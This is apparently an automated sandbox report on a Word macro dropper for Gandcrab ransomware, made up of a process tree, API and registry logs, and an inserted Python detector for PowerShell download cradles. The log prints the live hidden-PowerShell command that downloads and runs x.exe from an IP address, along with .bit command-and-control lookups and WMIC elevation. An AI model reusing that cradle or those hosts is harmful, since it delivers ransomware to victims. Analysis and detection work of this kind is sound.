Doc Dropper - Gandcrab Analysis | Sequential Behavior
VTI SCORE: 100/100
Target: Windows 10 (64-bit), MS Office 2016 | ms_office
Classification: Dropper, Trojan, Downloader, Ransomware

99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809 (SHA256)

sample_file.doc

Word Document

Created at 2018-04-20 18:19:00

Notifications (2/3)

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

The overall sleep time of all monitored processes was truncated from "1 minute, 10 seconds" to "1 minute, 10 seconds" to reveal dormant functionality.

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x1230 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -
#2 0x11a0 Child Process Medium powershell.exe powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe'); #1
#4 0x5e0 Child Process Medium powershell.exe "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\FD1HVy\AppData\Local\Temp\\PHfW.exe #2
#6 0xc0c Child Process Medium phfw.exe "C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe" #4
#7 0xdec Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #6
#9 0x10f4 Child Process Medium nslookup.exe nslookup ransomware.bit ns2.corp-servers.ru #6
#11 0x1064 Autostart Medium ibpbzu.exe "C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe" -
#12 0x1128 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#14 0x1220 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#16 0x124c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#18 0x135c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#20 0x1068 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#22 0x1100 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#24 0x1120 Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#26 0x113c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#28 0xe0c Child Process Medium nslookup.exe nslookup zonealarm.bit ns1.corp-servers.ru #11
#31 0x3a4 Child Process High (Elevated) wmic.exe "C:\WINDOWS\SysWOW64\wbem\wmic.exe" process call create "cmd /c start C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe" #11
#33 0x150 RPC Server System (Elevated) svchost.exe C:\WINDOWS\system32\svchost.exe -k netsvcs #31
#34 0x674 RPC Server System (Elevated) wmiprvse.exe C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding #33
#35 0xf0 Child Process High (Elevated) cmd.exe cmd /c start C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe #34
#37 0x608 Child Process High (Elevated) ibpbzu.exe C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe #35

Behavior Information - Sequential View

Process #1: winword.exe
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\FD1HVy\Desktop\
Monitor Start Time: 00:00:19, Reason: Analysis Target
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:05:27
OS Process Information
Information Value
PID 0x1230
Parent PID 0x9f4 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
Region
For performance reasons, the remaining 328 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0x1234
Category Operation Information Success Count Logfile
Module Get Handle module_name = Unknown module name, base_address = 0x7ff665300000 True 1 Fn
Module Load module_name = Comctl32.dll, base_address = 0x7ff9d2a40000 True 1 Fn
Module Get Handle module_name = Unknown module name, base_address = 0x7ff9ce360000 True 1 Fn
Module Get Address module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7ff9ce4265b0 True 1 Fn
Module Get Address module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7ff9ce41c070 True 1 Fn
Module Get Address module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7ff9ce428a00 True 1 Fn
Module Get Address module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7ff9ce425a10 True 1 Fn
Module Get Handle module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 False 1 Fn
Module Load module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7ff9b0150000 True 1 Fn
Environment Get Environment String name = DDRYBUR False 1 Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1 Fn
Module Load module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL, base_address = 0x21fba9b0000 True 1 Fn
System Get Info type = Operating System True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Licenses True 1 Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } False 1 Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x7ff9db420000 True 1 Fn
Window Create class_name = ThunderMain, wndproc_parameter = 0 True 1 Fn
System Get Info type = Operating System True 1 Fn
Module Get Handle module_name = USER32, base_address = 0x7ff9ddc60000 True 1 Fn
Module Get Address module_name = Unknown module name, function = GetSystemMetrics, address_out = 0x7ff9ddc6f150 True 1 Fn
Module Get Address module_name = Unknown module name, function = MonitorFromWindow, address_out = 0x7ff9ddc68a40 True 1 Fn
Module Get Address module_name = Unknown module name, function = MonitorFromRect, address_out = 0x7ff9ddc67990 True 1 Fn
Module Get Address module_name = Unknown module name, function = MonitorFromPoint, address_out = 0x7ff9ddc66c10 True 1 Fn
Module Get Address module_name = Unknown module name, function = EnumDisplayMonitors, address_out = 0x7ff9ddc939e0 True 1 Fn
Module Get Address module_name = Unknown module name, function = GetMonitorInfoA, address_out = 0x7ff9ddc67e90 True 1 Fn
Module Get Address module_name = Unknown module name, function = EnumDisplayDevicesA, address_out = 0x7ff9ddc81b50 True 1 Fn
System Get Info type = Operating System True 1 Fn
Module Get Handle module_name = oleaut32.dll, base_address = 0x7ff9db420000 True 1 Fn
Module Get Address module_name = Unknown module name, function = DispCallFunc, address_out = 0x7ff9db428de0 True 1 Fn
Module Get Address module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7ff9db4303c0 True 1 Fn
Module Get Address module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7ff9db454020 True 1 Fn
Module Get Address module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7ff9db43b880 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7ff9db431f50 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7ff9db42f5c0 True 1 Fn
Module Get Address module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7ff9db47bd10 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7ff9db42efd0 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7ff9db42df60 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7ff9db422190 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7ff9db421eb0 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7ff9db481f60 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7ff9db421b80 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7ff9db481f30 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7ff9db4823b0 True 1 Fn
Module Get Address module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7ff9db4807c0 True 1 Fn
Module Get Address module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7ff9db480650 True 1 Fn
Module Get Address module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7ff9db4819e0 True 1 Fn
Module Get Address module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7ff9db481a50 True 1 Fn
Module Get Address module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7ff9db4819b0 True 1 Fn
Module Get Address module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7ff9db423700 True 1 Fn
Module Get Address module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7ff9db4226b0 True 1 Fn
Module Get Address module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7ff9db422c30 True 1 Fn
Module Get Address module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7ff9db481870 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarFormat, address_out = 0x7ff9db486540 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7ff9db486750 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7ff9db4867d0 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7ff9db4868e0 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7ff9db486630 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7ff9db486d20 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarMonthName, address_out = 0x7ff9db4869d0 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarAdd, address_out = 0x7ff9db472760 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarAnd, address_out = 0x7ff9db475000 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarCat, address_out = 0x7ff9db473150 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarDiv, address_out = 0x7ff9db4732a0 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarEqv, address_out = 0x7ff9db475190 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarIdiv, address_out = 0x7ff9db4751c0 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarImp, address_out = 0x7ff9db475380 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarMod, address_out = 0x7ff9db475470 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarMul, address_out = 0x7ff9db473930 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarOr, address_out = 0x7ff9db475690 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarPow, address_out = 0x7ff9db474220 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarSub, address_out = 0x7ff9db474450 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarXor, address_out = 0x7ff9db475830 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarAbs, address_out = 0x7ff9db471950 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarFix, address_out = 0x7ff9db471c40 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarInt, address_out = 0x7ff9db471e40 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarNeg, address_out = 0x7ff9db472020 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarNot, address_out = 0x7ff9db4755f0 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarRound, address_out = 0x7ff9db4723b0 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarCmp, address_out = 0x7ff9db436710 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarDecAdd, address_out = 0x7ff9db4764d0 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarDecCmp, address_out = 0x7ff9db421390 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarBstrCat, address_out = 0x7ff9db4374a0 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7ff9db421560 True 1 Fn
Module Get Address module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7ff9db436bd0 True 1 Fn
Module Get Handle module_name = ole32.dll, base_address = 0x7ff9dd150000 True 1 Fn
Module Get Address module_name = Unknown module name, function = CoCreateInstanceEx, address_out = 0x7ff9dd846770 True 1 Fn
Module Get Address module_name = Unknown module name, function = CLSIDFromProgIDEx, address_out = 0x7ff9dd834b70 True 1 Fn
System Get Time type = Local Time, time = 2018-04-20 20:20:35 (Local Time) True 2 Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common True 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 195, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1 Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1 Fn
Module Get Address module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7ff9b015f200 True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1 Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 False 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 False 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1 Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 1 Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1 Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1 Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1 Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\System32\stdole2.tlb True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1 Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1 Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1 Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1 Fn
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 1
Fn
System Get Time type = Local Time, time = 2018-04-20 20:20:35 (Local Time) True 1
Fn
System Get Cursor x_out = 134, y_out = 125 True 1
Fn
System Get Time type = Local Time, time = 2018-04-20 20:20:35 (Local Time) True 2
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 1
Fn
System Get Time type = Local Time, time = 2018-04-20 20:20:35 (Local Time) True 1
Fn
System Get Cursor x_out = 134, y_out = 125 True 1
Fn
System Get Time type = Local Time, time = 2018-04-20 20:20:35 (Local Time) True 7
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 713, address_out = 0x7ff9b075a1f4 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 528, address_out = 0x7ff9b052273c True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 526, address_out = 0x7ff9b0524974 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 522, address_out = 0x7ff9b0522694 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 712, address_out = 0x7ff9b075a03c True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 617, address_out = 0x7ff9b0522490 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 717, address_out = 0x7ff9b073b034 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 619, address_out = 0x7ff9b0522540 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 524, address_out = 0x7ff9b05226e8 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 632, address_out = 0x7ff9b051fe60 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 608, address_out = 0x7ff9b052142c True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 711, address_out = 0x7ff9b0759eb0 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 600, address_out = 0x7ff9b04dc6fc True 1
Fn
Process Create process_name = powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe');, os_pid = 0x11a0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
System Get Cursor x_out = 471, y_out = 287 True 1
Fn
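The Process Create entry above is the whole infection chain in one line: WINWORD.EXE launches powershell.exe with a hidden window (-w 1), a WebClient.DownloadFile() fetch from an IP-literal URL into %TEMP%, and a second hidden PowerShell that Start-Process-es the dropped file. The following detection logic is an added example and is not VMRay code or part of the report; its EVENTS list is constructed from the command lines in the report's process table (plus one benign control event), and the field names, pattern set and threshold are assumptions.

```python
"""Flag an Office-spawned PowerShell download cradle from process-creation events.

Added example; not part of the VMRay report. EVENTS is constructed from the
report's process table (hex PIDs, parent PIDs, command lines); field names are assumed.
"""
import re

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Each pattern is one building block of the cradle seen in the report's command line.
CRADLE_PATTERNS = {
    "download_api": r"\.Download(?:File|String|Data)\s*\(|Invoke-WebRequest|\biwr\b",
    "launch_dropped": r"Start-Process",
    "hidden_window": r"-w(?:indowstyle)?\s+(?:1|hidden)\b",   # -w 1 is -WindowStyle Hidden
    "temp_path": r"GetTempPath\(\)|\\AppData\\Local\\Temp\\",
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
IP_HOST_RE = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)", re.IGNORECASE)

# Constructed sample: the chain from the report plus one benign control event (pid 0x2000).
EVENTS = [
    {"pid": 0x1230, "ppid": 0x0, "image": "winword.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"'},
    {"pid": 0x11a0, "ppid": 0x1230, "image": "powershell.exe",
     "cmdline": "powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile("
                "'http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\\PHfW.exe'));"
                "powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\\PHfW.exe');"},
    {"pid": 0x5e0, "ppid": 0x11a0, "image": "powershell.exe",
     "cmdline": r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\FD1HVy\AppData\Local\Temp\\PHfW.exe'},
    {"pid": 0xc0c, "ppid": 0x5e0, "image": "phfw.exe",
     "cmdline": r'"C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe"'},
    {"pid": 0x2000, "ppid": 0x1000, "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\ops\rotate-logs.ps1"},
]


def office_ancestor(ev, by_pid):
    """Walk the parent chain; return the Office process that ultimately spawned ev, or None."""
    seen = set()
    cur = by_pid.get(ev["ppid"])
    while cur and cur["pid"] not in seen:
        if cur["image"].lower() in OFFICE_IMAGES:
            return cur
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])
    return None


def cradle_indicators(cmdline):
    """Names of the cradle patterns present in a command line."""
    return [name for name, pat in CRADLE_PATTERNS.items() if re.search(pat, cmdline, re.IGNORECASE)]


def extract_iocs(cmdline):
    """URLs in the command line, and the subset whose host is a bare IP address."""
    urls = URL_RE.findall(cmdline)
    return {"urls": urls, "ip_literal_urls": [u for u in urls if IP_HOST_RE.match(u)]}


def find_cradles(events, min_indicators=2):
    """Flag any process with an Office ancestor and at least min_indicators cradle patterns.

    The ancestor walk is what catches the second powershell.exe (#4): on its own it only
    shows Start-Process and a hidden window, but its grandparent is WINWORD.EXE.
    """
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        ind = cradle_indicators(ev["cmdline"])
        anc = office_ancestor(ev, by_pid)
        if anc and len(ind) >= min_indicators:
            hits.append({"pid": ev["pid"], "office_parent_pid": anc["pid"],
                         "indicators": ind, **extract_iocs(ev["cmdline"])})
    return hits


if __name__ == "__main__":
    for hit in find_cradles(EVENTS):
        print(hex(hit["pid"]), hit["indicators"], hit["urls"])
```

Run against the constructed events, the two PowerShell instances (0x11a0 and 0x5e0) are flagged, phfw.exe is not (one indicator, no cradle syntax), and the benign control is ignored because it has no Office ancestor. Note that the monitored PowerShell later probes the ModuleLogging and Transcription policy keys and finds neither present, so on this host the process-creation command line is the only record of the cradle; with Script Block Logging enabled the same patterns would also appear in event 4104.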
Process #2: powershell.exe
1181 55
Information Value
ID #2
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe');
Initial Working Directory C:\Users\FD1HVy\Documents\
Monitor Start Time: 00:00:37, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:05:09
OS Process Information
Information Value
PID 0x11a0
Parent PID 0x1230 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs 0xDA8, 0x138C, 0x1394, 0x135C, 0x10A4, 0x10B8, 0x10D0, 0x1118, 0x1124, 0x10F8, 0x10F4, 0xC24, 0xC04, 0x11F8, 0x12A8, 0x1044, 0x1188, 0xFE0, 0xAA8, 0xAB4, 0x1050, 0x1064, 0x12F0, 0x1124, 0x1100
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x0000004808ae0000 0x4808ae0000 0x4808b5ffff Private Memory Readable, Writable True False False -
private_0x0000004808b60000 0x4808b60000 0x4808bdffff Private Memory Readable, Writable True False False -
private_0x0000004808c00000 0x4808c00000 0x4808dfffff Private Memory Readable, Writable True False False -
private_0x0000004808e00000 0x4808e00000 0x4808e7ffff Private Memory Readable, Writable True False False -
private_0x0000004808e80000 0x4808e80000 0x4808efffff Private Memory Readable, Writable True False False -
private_0x0000004808f00000 0x4808f00000 0x4808f7ffff Private Memory Readable, Writable True False False -
private_0x0000004808f80000 0x4808f80000 0x4808ffffff Private Memory Readable, Writable True False False -
private_0x0000004809000000 0x4809000000 0x480907ffff Private Memory Readable, Writable True False False -
private_0x0000004809080000 0x4809080000 0x48090fffff Private Memory Readable, Writable True False False -
private_0x0000004809100000 0x4809100000 0x480913ffff Private Memory Readable, Writable True False False -
private_0x0000004809140000 0x4809140000 0x48091bffff Private Memory Readable, Writable True False False -
private_0x00000048091c0000 0x48091c0000 0x480923ffff Private Memory Readable, Writable True False False -
private_0x0000004809240000 0x4809240000 0x48092bffff Private Memory Readable, Writable True False False -
